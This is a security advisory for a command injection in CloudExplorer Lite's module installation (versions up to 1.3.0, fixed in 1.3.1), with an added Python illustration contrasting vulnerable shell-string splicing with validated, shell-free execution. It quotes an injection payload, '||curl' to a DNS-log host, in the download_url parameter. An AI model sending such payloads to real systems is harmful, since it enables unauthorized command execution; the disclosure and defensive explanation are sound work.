Impact
A command injection vulnerability exists in the installation function of module management.
The reproduction steps are as follows:
||curl http://wwww.aa.com
curl -sL ||curl http://wwww.aa.com -o /opt/cloudexplorer/downloads/$_file || exit 1
Call this interface with the download_url parameter set to ||curl http://wwww.aa.com so that the backend host executes curl http://wwww.aa.com. Here, http://wwww.aa.com is the dnslog address.
After the request was sent, dnslog successfully received the request, proving that the backend host executed the command curl http://wwww.aa.com.
Affected versions: <= 1.3.0.
Patches
The vulnerability has been fixed in v1.3.1.
Workarounds
It is recommended to upgrade the version to v1.3.1.
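The injection described under Impact, as an added example that is not CloudExplorer Lite's code or its v1.3.1 fix: it splices the advisory's payload into the same command string, lists the shell control operators that result, and contrasts that with validating the inputs and building an argument list that is run without a shell. The allow-listed host modules.example.com, the file name module.tar.gz and all function names are assumptions made for illustration.

```python
import re
import shlex
from urllib.parse import urlsplit

DOWNLOAD_DIR = "/opt/cloudexplorer/downloads"  # directory from the advisory's command
ALLOWED_HOSTS = {"modules.example.com"}        # assumption: hypothetical trusted host
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,127}")


def spliced_command(download_url, file_name):
    """Vulnerable pattern: request input concatenated into shell text."""
    return f"curl -sL {download_url} -o {DOWNLOAD_DIR}/{file_name} || exit 1"


def control_operators(command):
    """Return the shell control operators (||, &&, ;, |, ...) found in command."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    return [tok for tok in lexer if tok and set(tok) <= set("();<>|&")]


def safe_download_argv(download_url, file_name):
    """Validate both inputs and return an argv list for shell-free execution."""
    if re.search(r"[\s\x00-\x1f\x7f]", download_url):
        raise ValueError("whitespace or control character in URL")
    parts = urlsplit(download_url)
    if parts.scheme != "https" or parts.hostname not in ALLOWED_HOSTS:
        raise ValueError("URL scheme or host not allowed")
    if not SAFE_NAME.fullmatch(file_name):
        raise ValueError("unsafe file name")
    # Each list element reaches curl as exactly one argument; pass the list to
    # subprocess.run(argv, shell=False, check=True) so no shell parses it.
    return ["curl", "-sL", "-o", f"{DOWNLOAD_DIR}/{file_name}", download_url]


if __name__ == "__main__":
    payload = "||curl http://wwww.aa.com"  # payload quoted in the advisory
    good = "https://modules.example.com/m.tar.gz"  # constructed sample URL
    for url in (good, payload):
        ops = control_operators(spliced_command(url, "module.tar.gz"))
        print(f"{url!r}: operators seen by a shell = {ops}")
        try:
            print("  argv:", safe_download_argv(url, "module.tar.gz"))
        except ValueError as exc:
            print("  rejected:", exc)
```

With the benign URL the only operator is the template's own `||`; the payload adds a second one, which is what turns one command into two.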
References
If you have any questions or comments about this advisory:
Open an issue in https://github.com/CloudExplorer-Dev/CloudExplorer-Lite
Email us at xin.bai@fit2cloud.com